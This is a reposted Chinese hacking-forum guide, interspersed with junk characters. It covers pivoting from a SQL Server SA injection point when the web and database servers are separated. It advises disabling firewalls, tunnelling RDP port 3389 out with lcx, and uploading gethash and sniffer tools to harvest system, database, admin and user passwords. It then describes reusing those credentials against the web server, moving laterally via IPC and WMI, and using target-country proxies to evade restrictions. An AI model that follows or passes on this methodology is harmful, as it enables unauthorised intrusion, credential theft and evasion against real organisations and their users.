当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。, D* i7 _8 ?6 ^7 R
) p; t$ K* g& B# ^/ d& I3 K9 J( O# B8 n0 I. l+ ^0 q
1 k. X# u5 F8 I: Y( _SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出): Q' p1 n9 b$ r
) P* N5 _" B5 O1 o8 b$ a* \( o. W) y: ?& r7 z
一、DB机有公网IP.! d C X, t. x8 @" B
* S3 N& _* C( {5 }- z1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.) z/ n# {* l2 q F
/ M" q+ |8 t& P, A o+ R8 u. t" H. o+ Y4 Q
5 q7 w/ ^ f( K9 S; ^* u# r$ a$ }' ]2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.9 _0 _9 @" \# I) a# K4 M ?
9 k; H% U* E, d% t9 ^; _( C
/ a" y! i) T' P- p3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com& d- c* J* z" }0 I
! J3 P( b' R4 V$ m4 a! B' F
2 a: a: f; x1 \- A
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
& I& l( t! P7 M, V- _
) |. n* i* S- }/ _5 [
5 Y2 E. g1 O, I/ h
. l4 {( l9 t% o( q! I+ W二、DB机只有内网IP
0 t+ C# Q4 n1 u) z5 \, u" D. a& S$ m$ B
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.1 |: U3 D! V, F7 }
6 F8 e" K3 v4 I
" g% J/ m2 D6 m5 K; o$ m: E2:停掉防火墙和IP策略再从内往外扫描. O) R% ~& N: i4 ~% J- D1 R
; X9 n. H$ L! F* n
- X$ ]2 i) V" l2 h4 E3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
# n$ o& c6 d% v$ N
0 ^( c/ W( t6 ^6 y+ ?. _& W% e5 e6 E# }7 G5 W1 K' L1 ]
4:学会密码规律分析往往会有惊喜., i, R0 T! f1 R1 D) `1 \
( |9 J& k, Q! q# b
- {& T _: k3 W4 i5 ]9 X9 Y3 C
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等% X% {/ \7 p1 y( o
4 v8 u: q, R4 \) [. [( ^* `0 o9 e) N* O
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |